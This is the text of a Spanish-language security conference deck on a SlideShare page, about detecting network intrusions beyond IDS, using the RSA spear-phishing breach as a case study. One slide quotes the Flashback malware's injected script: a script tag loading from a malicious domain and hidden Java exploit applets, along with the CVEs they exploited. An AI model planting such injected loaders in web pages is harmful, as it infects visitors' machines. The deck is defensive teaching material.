SlideShare une entreprise Scribd logo
1  sur  34
Télécharger pour lire hors ligne
Detectando Intrusiones en la
            Red




       Mas allá de los IDS
Roberto
                            Martínez

      • Instructor UniversIT y Conferencista
• Consultor Especializado en Seguridad Informática
  • Malware Researcher at Global Research and
   Analysis Team Kaspersky Lab | Latam -Mexico



  @r0bertmart1nez
Agenda
•   ¿Esta alguien seguro?
•   RSA Anatomía de un ataque
•   ¿Cuanto es suficiente en Seguridad?
•   El problema
•   Demo: Fisonomía de un ataque
•   La solución
•   Demo: Esquemas de detección
•   Conclusión
¿Está alguien esta seguro?
Anatomía de un ataque




  http://blogs.rsa.com/rivner/anatomy-of-an-attack/
Acciones previas al ataque
  Lo primero que hicieron los hackers detrás de la APT fué buscar información públicamente disponible sobre
• empleados específicos, principalmente redes sociales.
  Una vez que consiguieron la información, enviaron a esos usuarios un correo electrónico tipo Spear Phishing.
•
• Click to edit Master text styles

 El Problema
  – Second level
    • Third level
       – Fourth level
           » Fifth level
¿Como sucedió el ataque?
• El atacante envío dos correos electrónicos diferentes durante un
  período de dos días.
• Los dos correos electrónicos fueron enviados a dos pequeños grupos
  de empleados sin importar que fueran de alto perfil.
• El correo electrónico fue diseñado lo suficientemente bien como
  para truco, uno de los empleados lo recuperara de su carpeta de
  correo no deseado y abriera el archivo de excel adjunto.
• La hoja de cálculo contenía una vulnerabilidad de día cero que
  instalaba una puerta trasera a través de una vulnerabilidad en
  Adobe Flash (CVE-2011-0609).
• Click to edit Master text styles
  – Second level
    • Third level
       – Fourth level
           » Fifth level
Una vez abierto el correo….
El resultado $ 66.3 mdd.




   http://www.govinfosecurity.com/articles.php?art_id=3913
¿Cuanto es suficiente en Seguridad?
Cuatro principales tipos de ataque
• Estas empresas implementan cualquier combinación imaginable
  de seguridad perimetral, seguridad end-point, campañas de
  sensibilización al usuario final, políticas y controles.
¿Que esta
fallando?
El eslabón más débil
2011 - 2012 Targets
Flashback / Flashfake
<script
src="http://domainname.rr.nu/nl.php?
        Vulnerabilities exploited:
p=d"></script>
        CVE2008-5353 ("deserializing Calendar objects")
        CVE2011-3544
        CVE2012-0507
                                    if(rts != "on"){
                                    document.write('<applet
                                    archive="rh-3.jar"
                                    code="rhcls" width="1"
                                    height="1"></applet>');
                                    document.write('<applet
                                    archive="cl-3.jar"
                                    code="msf/x/AppletX"
                                    width="1"
                                    height="1"></applet>');
                                    }
Alexander Gostev - Global Research and Analysis Team at Kaspersky Lab  http://www.securelist.com
Tim - Global Research and Analysis Team at Kaspersky Lab  http://www.securelist.com
La solución
Herramientas avanzadas de
        monitoreo
Análisis de Topología Vulnerable
México en números

Distrito federal   4872116   318481
-                  4622291   313378
quintana roo       336357    35007
nuevo leon         389071    26309
jalisco            342151    23494
mexico             228796    16139
veracruz-llave     90464     7728
puebla             124722    6476
baja california    99374     5082
chihuahua          42742     4610
morelos            54586     4610
queretaro de       46559     3873
arteaga
Conclusión
Gracias



@r0bertmart1nez
roberto.martinez@kaspersky.com

Contenu connexe

Similaire à Detectando intrusos en la red

Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]RootedCON
 
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Cristián Rojas, MSc., CSSLP
 
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...Héctor López
 
Pentest - El Arte de la Guerra
Pentest - El Arte de la GuerraPentest - El Arte de la Guerra
Pentest - El Arte de la GuerraLuis Cortes Zavala
 
Curso Virtual de Metasploit Framework 2019
Curso Virtual de Metasploit Framework 2019 Curso Virtual de Metasploit Framework 2019
Curso Virtual de Metasploit Framework 2019 Alonso Caballero
 
Mile2 top10latam
Mile2 top10latamMile2 top10latam
Mile2 top10latamwcuestas
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortJuan Oliva
 
Extendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSExtendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSPaloSanto Solutions
 
Desmitificando el pentest share
Desmitificando el pentest shareDesmitificando el pentest share
Desmitificando el pentest shareny4nyi
 
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...Internet Security Auditors
 
Ethical hacking udem
Ethical hacking udemEthical hacking udem
Ethical hacking udemUdem
 
Jade 1 Agents principios básicos
Jade 1 Agents principios básicosJade 1 Agents principios básicos
Jade 1 Agents principios básicosOctavio Abundez
 
ELK para analistas de seguridad y equipos Blue Team
ELK para analistas de seguridad y equipos Blue TeamELK para analistas de seguridad y equipos Blue Team
ELK para analistas de seguridad y equipos Blue TeamJose Manuel Ortega Candel
 
Backbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuBackbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuJosé Moreno
 

Similaire à Detectando intrusos en la red (20)

Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
 
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
 
Métodos vulnerabilidad activos
Métodos vulnerabilidad activosMétodos vulnerabilidad activos
Métodos vulnerabilidad activos
 
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
 
Pentest - El Arte de la Guerra
Pentest - El Arte de la GuerraPentest - El Arte de la Guerra
Pentest - El Arte de la Guerra
 
NcN_CSUC_CSIRT
NcN_CSUC_CSIRTNcN_CSUC_CSIRT
NcN_CSUC_CSIRT
 
CERT/CSIRT's tools: Con las manos en la masa
CERT/CSIRT's tools: Con las manos en la masaCERT/CSIRT's tools: Con las manos en la masa
CERT/CSIRT's tools: Con las manos en la masa
 
Curso Virtual de Metasploit Framework 2019
Curso Virtual de Metasploit Framework 2019 Curso Virtual de Metasploit Framework 2019
Curso Virtual de Metasploit Framework 2019
 
Pimp your Android. Rooted CON 2012.
Pimp your Android. Rooted CON 2012.Pimp your Android. Rooted CON 2012.
Pimp your Android. Rooted CON 2012.
 
Mile2 top10latam
Mile2 top10latamMile2 top10latam
Mile2 top10latam
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con Snort
 
Extendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSExtendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPS
 
Presentación GridUAM 201112
Presentación GridUAM 201112Presentación GridUAM 201112
Presentación GridUAM 201112
 
Desmitificando el pentest share
Desmitificando el pentest shareDesmitificando el pentest share
Desmitificando el pentest share
 
3.redes seguridad
3.redes seguridad3.redes seguridad
3.redes seguridad
 
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
 
Ethical hacking udem
Ethical hacking udemEthical hacking udem
Ethical hacking udem
 
Jade 1 Agents principios básicos
Jade 1 Agents principios básicosJade 1 Agents principios básicos
Jade 1 Agents principios básicos
 
ELK para analistas de seguridad y equipos Blue Team
ELK para analistas de seguridad y equipos Blue TeamELK para analistas de seguridad y equipos Blue Team
ELK para analistas de seguridad y equipos Blue Team
 
Backbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuBackbox Distribución deriva de Ubuntu
Backbox Distribución deriva de Ubuntu
 

Plus de Jaime Restrepo

I Know You ( iKy OSINT Tool )
I Know You ( iKy OSINT Tool )I Know You ( iKy OSINT Tool )
I Know You ( iKy OSINT Tool )Jaime Restrepo
 
i fought the law and the law lost
i fought the law and the law losti fought the law and the law lost
i fought the law and the law lostJaime Restrepo
 
How to build a powerfull open source soc4
How to build a powerfull open source soc4How to build a powerfull open source soc4
How to build a powerfull open source soc4Jaime Restrepo
 
Zer 0 no zer(0 day) dragon jar
Zer 0 no zer(0 day)   dragon jarZer 0 no zer(0 day)   dragon jar
Zer 0 no zer(0 day) dragon jarJaime Restrepo
 
Alta seguridad para clusters críticos
Alta seguridad para clusters críticosAlta seguridad para clusters críticos
Alta seguridad para clusters críticosJaime Restrepo
 
Bogotá Wardriving (Spanish)
Bogotá Wardriving (Spanish)Bogotá Wardriving (Spanish)
Bogotá Wardriving (Spanish)Jaime Restrepo
 
IoT Cyber Attacks: Comprometiendo la Ciberseguridad de Gasolineras en Latinoa...
IoT Cyber Attacks: Comprometiendo la Ciberseguridad de Gasolineras en Latinoa...IoT Cyber Attacks: Comprometiendo la Ciberseguridad de Gasolineras en Latinoa...
IoT Cyber Attacks: Comprometiendo la Ciberseguridad de Gasolineras en Latinoa...Jaime Restrepo
 
WordPress, another terror story (Spanish)
WordPress, another terror story (Spanish)WordPress, another terror story (Spanish)
WordPress, another terror story (Spanish)Jaime Restrepo
 
Hunting Buffer Overflow. A la caza de funciones inseguras en GNU/Linux
Hunting Buffer Overflow. A la caza de funciones inseguras en GNU/LinuxHunting Buffer Overflow. A la caza de funciones inseguras en GNU/Linux
Hunting Buffer Overflow. A la caza de funciones inseguras en GNU/LinuxJaime Restrepo
 
Hackeando el mundo exterior a través de Bluetooth Low-Energy
Hackeando el mundo exterior a través de Bluetooth Low-EnergyHackeando el mundo exterior a través de Bluetooth Low-Energy
Hackeando el mundo exterior a través de Bluetooth Low-EnergyJaime Restrepo
 
Memorias perito vol_7_dragonjar_con
Memorias perito vol_7_dragonjar_conMemorias perito vol_7_dragonjar_con
Memorias perito vol_7_dragonjar_conJaime Restrepo
 
Cloud native security en tiempo de coronavirus dragon jar
Cloud native security en tiempo de coronavirus dragon jarCloud native security en tiempo de coronavirus dragon jar
Cloud native security en tiempo de coronavirus dragon jarJaime Restrepo
 
Analysis of time windows to detect botnets behaviours
Analysis of time windows to detect botnets behavioursAnalysis of time windows to detect botnets behaviours
Analysis of time windows to detect botnets behavioursJaime Restrepo
 
Bug Bounty Experiences (Spanish)
Bug Bounty Experiences (Spanish)Bug Bounty Experiences (Spanish)
Bug Bounty Experiences (Spanish)Jaime Restrepo
 
Threat intel malware_analysis
Threat intel malware_analysisThreat intel malware_analysis
Threat intel malware_analysisJaime Restrepo
 
Bugbounty en Español, todo lo que no te han dicho
Bugbounty en Español, todo lo que no te han dichoBugbounty en Español, todo lo que no te han dicho
Bugbounty en Español, todo lo que no te han dichoJaime Restrepo
 
Técnicas de Inteligencia en la lucha contra el Crimen Organizado y el Terrorismo
Técnicas de Inteligencia en la lucha contra el Crimen Organizado y el TerrorismoTécnicas de Inteligencia en la lucha contra el Crimen Organizado y el Terrorismo
Técnicas de Inteligencia en la lucha contra el Crimen Organizado y el TerrorismoJaime Restrepo
 
Gestión del tiempo en tiempos del COVID-19
Gestión del tiempo en tiempos del COVID-19Gestión del tiempo en tiempos del COVID-19
Gestión del tiempo en tiempos del COVID-19Jaime Restrepo
 
Pentest: Técnicas alternativas para un cliente “experimentado” – Nelson Boris...
Pentest: Técnicas alternativas para un cliente “experimentado” – Nelson Boris...Pentest: Técnicas alternativas para un cliente “experimentado” – Nelson Boris...
Pentest: Técnicas alternativas para un cliente “experimentado” – Nelson Boris...Jaime Restrepo
 
CSRF: El "Nuevo" Target - Juan David Castro
CSRF: El "Nuevo" Target - Juan David CastroCSRF: El "Nuevo" Target - Juan David Castro
CSRF: El "Nuevo" Target - Juan David CastroJaime Restrepo
 

Plus de Jaime Restrepo (20)

I Know You ( iKy OSINT Tool )
I Know You ( iKy OSINT Tool )I Know You ( iKy OSINT Tool )
I Know You ( iKy OSINT Tool )
 
i fought the law and the law lost
i fought the law and the law losti fought the law and the law lost
i fought the law and the law lost
 
How to build a powerfull open source soc4
How to build a powerfull open source soc4How to build a powerfull open source soc4
How to build a powerfull open source soc4
 
Zer 0 no zer(0 day) dragon jar
Zer 0 no zer(0 day)   dragon jarZer 0 no zer(0 day)   dragon jar
Zer 0 no zer(0 day) dragon jar
 
Alta seguridad para clusters críticos
Alta seguridad para clusters críticosAlta seguridad para clusters críticos
Alta seguridad para clusters críticos
 
Bogotá Wardriving (Spanish)
Bogotá Wardriving (Spanish)Bogotá Wardriving (Spanish)
Bogotá Wardriving (Spanish)
 
IoT Cyber Attacks: Comprometiendo la Ciberseguridad de Gasolineras en Latinoa...
IoT Cyber Attacks: Comprometiendo la Ciberseguridad de Gasolineras en Latinoa...IoT Cyber Attacks: Comprometiendo la Ciberseguridad de Gasolineras en Latinoa...
IoT Cyber Attacks: Comprometiendo la Ciberseguridad de Gasolineras en Latinoa...
 
WordPress, another terror story (Spanish)
WordPress, another terror story (Spanish)WordPress, another terror story (Spanish)
WordPress, another terror story (Spanish)
 
Hunting Buffer Overflow. A la caza de funciones inseguras en GNU/Linux
Hunting Buffer Overflow. A la caza de funciones inseguras en GNU/LinuxHunting Buffer Overflow. A la caza de funciones inseguras en GNU/Linux
Hunting Buffer Overflow. A la caza de funciones inseguras en GNU/Linux
 
Hackeando el mundo exterior a través de Bluetooth Low-Energy
Hackeando el mundo exterior a través de Bluetooth Low-EnergyHackeando el mundo exterior a través de Bluetooth Low-Energy
Hackeando el mundo exterior a través de Bluetooth Low-Energy
 
Memorias perito vol_7_dragonjar_con
Memorias perito vol_7_dragonjar_conMemorias perito vol_7_dragonjar_con
Memorias perito vol_7_dragonjar_con
 
Cloud native security en tiempo de coronavirus dragon jar
Cloud native security en tiempo de coronavirus dragon jarCloud native security en tiempo de coronavirus dragon jar
Cloud native security en tiempo de coronavirus dragon jar
 
Analysis of time windows to detect botnets behaviours
Analysis of time windows to detect botnets behavioursAnalysis of time windows to detect botnets behaviours
Analysis of time windows to detect botnets behaviours
 
Bug Bounty Experiences (Spanish)
Bug Bounty Experiences (Spanish)Bug Bounty Experiences (Spanish)
Bug Bounty Experiences (Spanish)
 
Threat intel malware_analysis
Threat intel malware_analysisThreat intel malware_analysis
Threat intel malware_analysis
 
Bugbounty en Español, todo lo que no te han dicho
Bugbounty en Español, todo lo que no te han dichoBugbounty en Español, todo lo que no te han dicho
Bugbounty en Español, todo lo que no te han dicho
 
Técnicas de Inteligencia en la lucha contra el Crimen Organizado y el Terrorismo
Técnicas de Inteligencia en la lucha contra el Crimen Organizado y el TerrorismoTécnicas de Inteligencia en la lucha contra el Crimen Organizado y el Terrorismo
Técnicas de Inteligencia en la lucha contra el Crimen Organizado y el Terrorismo
 
Gestión del tiempo en tiempos del COVID-19
Gestión del tiempo en tiempos del COVID-19Gestión del tiempo en tiempos del COVID-19
Gestión del tiempo en tiempos del COVID-19
 
Pentest: Técnicas alternativas para un cliente “experimentado” – Nelson Boris...
Pentest: Técnicas alternativas para un cliente “experimentado” – Nelson Boris...Pentest: Técnicas alternativas para un cliente “experimentado” – Nelson Boris...
Pentest: Técnicas alternativas para un cliente “experimentado” – Nelson Boris...
 
CSRF: El "Nuevo" Target - Juan David Castro
CSRF: El "Nuevo" Target - Juan David CastroCSRF: El "Nuevo" Target - Juan David Castro
CSRF: El "Nuevo" Target - Juan David Castro
 

Detectando intrusos en la red

  • 1. Detectando Intrusiones en la Red Mas allá de los IDS
  • 2. Roberto Martínez • Instructor UniversIT y Conferencista • Consultor Especializado en Seguridad Informática • Malware Researcher at Global Research and Analysis Team Kaspersky Lab | Latam -Mexico @r0bertmart1nez
  • 3. Agenda • ¿Esta alguien seguro? • RSA Anatomía de un ataque • ¿Cuanto es suficiente en Seguridad? • El problema • Demo: Fisonomía de un ataque • La solución • Demo: Esquemas de detección • Conclusión
  • 5. Anatomía de un ataque http://blogs.rsa.com/rivner/anatomy-of-an-attack/
  • 6. Acciones previas al ataque Lo primero que hicieron los hackers detrás de la APT fué buscar información públicamente disponible sobre • empleados específicos, principalmente redes sociales. Una vez que consiguieron la información, enviaron a esos usuarios un correo electrónico tipo Spear Phishing. •
  • 7. • Click to edit Master text styles El Problema – Second level • Third level – Fourth level » Fifth level
  • 8. ¿Como sucedió el ataque? • El atacante envío dos correos electrónicos diferentes durante un período de dos días. • Los dos correos electrónicos fueron enviados a dos pequeños grupos de empleados sin importar que fueran de alto perfil. • El correo electrónico fue diseñado lo suficientemente bien como para truco, uno de los empleados lo recuperara de su carpeta de correo no deseado y abriera el archivo de excel adjunto. • La hoja de cálculo contenía una vulnerabilidad de día cero que instalaba una puerta trasera a través de una vulnerabilidad en Adobe Flash (CVE-2011-0609).
  • 9. • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level
  • 10. Una vez abierto el correo….
  • 11. El resultado $ 66.3 mdd. http://www.govinfosecurity.com/articles.php?art_id=3913
  • 12. ¿Cuanto es suficiente en Seguridad?
  • 14. • Estas empresas implementan cualquier combinación imaginable de seguridad perimetral, seguridad end-point, campañas de sensibilización al usuario final, políticas y controles.
  • 15.
  • 16.
  • 17.
  • 18.
  • 21. 2011 - 2012 Targets
  • 22. Flashback / Flashfake <script src="http://domainname.rr.nu/nl.php? Vulnerabilities exploited: p=d"></script> CVE2008-5353 ("deserializing Calendar objects") CVE2011-3544 CVE2012-0507 if(rts != "on"){ document.write('<applet archive="rh-3.jar" code="rhcls" width="1" height="1"></applet>'); document.write('<applet archive="cl-3.jar" code="msf/x/AppletX" width="1" height="1"></applet>'); }
  • 23. Alexander Gostev - Global Research and Analysis Team at Kaspersky Lab  http://www.securelist.com
  • 24. Tim - Global Research and Analysis Team at Kaspersky Lab  http://www.securelist.com
  • 25.
  • 27.
  • 30.
  • 31. México en números Distrito federal 4872116 318481 - 4622291 313378 quintana roo 336357 35007 nuevo leon 389071 26309 jalisco 342151 23494 mexico 228796 16139 veracruz-llave 90464 7728 puebla 124722 6476 baja california 99374 5082 chihuahua 42742 4610 morelos 54586 4610 queretaro de 46559 3873 arteaga
  • 33.